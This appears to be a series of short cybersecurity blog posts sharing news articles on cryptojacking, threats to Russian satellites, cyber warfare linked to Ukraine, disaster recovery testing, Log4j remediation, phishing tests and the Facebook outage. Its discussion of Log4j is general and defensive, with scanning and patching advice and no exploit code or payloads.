Given the recent tanking of bitcoin value in the open market, you might think that the criminal exploitation of private computers for coin mining might start to slow, but I guess the cyber bad guys in the world need to compensate for their value loses and mine new coins.
This article from the great team over at InfoSecurity is a great overview. Enjoy and beware!
All large, modern military operations are heavily reliant on satellites to provide a variety of logistics and planning information related to battlefield operations. That information includes GPS coordination and navigation, topographic imaging, drone command & control, and many other surveillance functions. Threats to Russia’s satellite infrastructure by those in opposition to the invasion and ongoing conflict in Ukraine have prompted Russian officials to respond and to respond harshly.
The following article from the great team at InfoSecurity details the Russian response / denial to hacking attempts against their satellite infrastructure:
Simply put, military conflicts are not what they used to be. So far during the conflict in Ukraine, we have seen the Russian space authority make a less than vailed threat against the safety of the International Space Station. We have also seen the delay and/or cancellation of satellite launches from Russian space facilities for agencies, governments, and organizations that oppose Russian activity in Ukraine. There are many factors to take into consideration, both short term and long term, when considering orbital resources and the effect this ongoing conflict can and will have on national and international assets in space.
Russia is still a primary partner in the ISS program and still provides the primary transportation and recovery services for the space station. Those services will most likely be on hold for the foreseeable future. The Russian space agency also provides satellite launch services for many nations and private agencies around the world. Those services have become a bargaining chip for international negotiations moving forward.
It will be very interesting to watch these situations develop over the weeks and months to come. We are seeing the Cold War rekindle and acts of fiction from recent TV shows and movies begin to come to life as scenarios play out on the “final frontier”.
As strange as this may sound, military attacks are no longer simply about soldiers and tanks and planes and bombs. Needless to say, there is nothing simple about war, but thanks to state sponsored hacking and the connected nature of critical infrastructure, cyber warfare has become a new front for every new military conflict. The conflict brewing in Ukraine is no different.
Threat levels have been raised by numerous national and international cybersecurity organizations, and malicious cyber activity is already being monitored related to this current conflict. Please remember that the types of attacks associated with these nation state conflicts are not perfectly crafted and restricted to only military targets. They can overflow into civilian networks that can quickly spread around the world in a matter of hours. NotPetya is a wonderful example of targeted cyber warfare run amuck.
Take the time to prepare your environments and make sure all your controls are in place and up to date. The Internet is staged to see quite a bit of malicious cyber activity in the days and weeks to come.
This article from the team at Dark Reading is an excellent overview of the challenges and approaches to DR testing as well as great reminder of the value and influence of the human factor. All successful disaster recovery planning starts with people – its all about teamwork, collaboration, and communication during an event.
We are well into the second week of reaction and remediation associated with the Apache Log4j vulnerability, so I wanted to pause and take a moment to recap what we know, what we should be doing now, and what we should be considering moving forward. Let us start with what we know.
Log4j is a remote code execution (RCE) vulnerability that can force the download of a malicious payload on vulnerable web servers and computers depending on the presence and/or configuration of certain server components. Specifically, exploitation of the vulnerability requires a single HTTP request containing malicious input from anywhere in the world, to an internet-facing server that is running a vulnerable instance of log4j, or the same HTTP request sent to a vulnerable computer within a compromised local network. The result is a full system compromise, and the exploit requires no authentication. It is important to stress that the Log4j vulnerability is not limited to Internet-facing web servers only. If a bad actor gains access to a local network, the same HTTP requests can be sent internal to IP-enabled devices on that network to compromise vulnerable systems. This is a very serious potential attack vector, and all of us should be working diligently to ensure all our devices and those of our friends, family, and clients are safe and properly protected.
So what should we be doing now. First and foremost, we should all be scanning our computers, servers, and other IP-enabled devices to look for vulnerable versions of Log4j. At this point, there are numerous scanning tools available from security experts, RMM vendors, and other platforms from which to choose. Please remember that these scanning tools take different approaches to identifying potentially vulnerable systems and devices. Some look for the presence of Log4j associated jar files. Others look for log entries on the device indicating the presence of malicious inbound activity. And then others actually send crafted HTTP requests looking for vulnerable system responses. Given these different detection methods, make sure to understand your scan results and take the time to verify the findings before you start pulling systems, servers, and devices offline.
Once you verify the presence of a vulnerable Log4j component, the next step involves determining why the component is present on that system or device and then reaching out to the application or device vendor to find updates, patches, and/or mitigation instructions. Log4j is so ubiquitous in applications, servers, and IP-enabled appliances, and application vendors and IoT vendors have embedded it and leveraged it hundreds of different ways, so vendor support may be a necessity to ensure you properly remediate the problem.
Once you have remediated the Log4j vulnerability on all your IP-enabled systems and devices, what do you do next? It is at this point that we all need to stop, document what we have done, take stock of what worked and what did not, and then be prepared to do it all over again in the future. The Log4j vulnerability is not going away. Scanning for this particular vulnerability needs to become part of your overall vulnerability management program. You will inevitably purchase new applications, devices, and systems and you need to ensure Log4j, if used, is properly updated (version 2.16 or later at this point in the component evolution). Also, as you work with your application vendors moving forward, some may try to convince you that the risk of Log4j only applies to web-exposed servers and devices. This statement is simply not true. Push back against these statements. Push back hard.
Nothing I have said about vulnerability management in this article is new, and nothing is particularly unique to Log4j. Scan your networks regularly (at least quarterly – more frequently if possible) and review those scan reports. Remediate your findings. If a finding cannot be remediated, budget for a replacement application or device. Keep your applications, components, and operating systems up to date. Cybercriminals are not going away. They don’t take vacations, and they don’t care how many other projects you are working on that prevented you from vulnerability remediation this month or this quarter. The threats are real and we all have to keep playing great defense. Good Luck!
The following is a great webpage from U.S. CERT on Log4j and associated resources:
October is Cybersecurity Awareness Month and as such I am going to make an effort to post as many awareness and training tips and tricks as I can throughout the month. This great article from the team over at Tripwire provides some sound advice – let the phishing test run its course! Enjoy the read and share what you learn. We are all in this cybersecurity battle together!
Given the timing of the outage for many of Facebook’s platforms yesterday – in the middle of the media storm surrounding a whistleblower from within the company sharing details of the social media giant’s potentially selfish decision making processes – lot’s of people were questioning whether this was a malicious attack against the company’s infrastructure. Alas, it was not, at least according to the engineering team at Facebook.
According an Infrastructure VP at Facebook, this outage stemmed from human error associated with a misconfigured BGP routing update. To be honest, this makes more sense versus a successful targeted external attack. Now, if you really wanted to go full on conspiracy theory, one could question whether the human error was intentional or unintentional, aka a distraction from the press coverage of the whistleblower. But that is not within my prevue.
Though the general report content of this article is not surprising, the stats provided are very helpful in terms of planning and training for end users dealing with an influx of SPAM and malicious emails. The analysis performed by the team at Tessian is quite thorough and provides some great insight around targeted industries and email delivery timing. Enjoy the read…